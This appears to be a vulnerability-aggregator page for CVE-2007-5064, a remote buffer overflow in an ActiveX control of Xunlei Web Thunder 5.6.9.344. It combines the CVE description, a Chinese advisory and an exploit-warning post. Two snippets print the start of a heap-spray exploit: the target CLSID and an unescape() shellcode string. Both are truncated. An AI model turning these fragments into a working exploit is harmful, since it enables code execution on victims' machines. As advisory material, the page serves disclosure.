EUVD-2007-5045

Malware in sbrugna...

Xunlei Web Thunder 5.6.9.344 ActiveX Control DownURL2 Method Remote Buffer Overflow Vulnerability

No description provided by source. var she132132132132llc13ode = unescape “%u9090 " + " %u9090 " + “%uefe9%u0000%u5a00%ua164%u0030%u0000%u408b%u8b0c” + “%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378” + “%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b” +...

Buffer overflow

Buffer overflow in a certain ActiveX control in Xunlei Web Thunder 5.6.9.344, possibly the DapPlayer ActiveX control in DapPlayerNow.dll, allows remote attackers to execute arbitrary code via a long first argument to the DownURL2 method. NOTE: some of these details are obtained from third party...

CVE-2007-5064

Buffer overflow in a certain ActiveX control in Xunlei Web Thunder 5.6.9.344, possibly the DapPlayer ActiveX control in DapPlayerNow.dll, allows remote attackers to execute arbitrary code via a long first argument to the DownURL2 method. NOTE: some of these details are obtained from third party...

Xunlei Web Thunder ActiveX控件DownURL2方法远程缓冲区溢出漏洞

Xunlei Web Thunder是一款在线加速下载程序。 Xunlei Web Thunder提供的ActiveX控件存在缓冲区溢出，远程攻击者可以利用漏洞以应用程序权限执行任意指令。 问题存在于DownURL2方法处理中，由于对参数缺少充分过滤，构建恶意WEB页，诱使用户访问，可导致以应用程序权限执行任意指令。 Xunlei Web Thunder 5.6.9.344 目前没有解决方案提供： http://my.xunlei.com/setup.htm OBJECT id=target classid=clsid:...

Thunder 5.6.9.344 ActiveX 0day Remote Code Executi-vulnerability warning-the black bar safety net

Has been successfully tested,not card,is off IE OBJECT id=target classid=clsid:EEDD6FF9-13DE-496B-9A1C-D78B3215E266/OBJECT SCRIPT language=javascript var she132132132132llc13ode = unescape"%u9090"+"%u9090"+ "%uefe9%u0000%u5a00%ua164%u0030%u0000%u408b%u8b0c" +...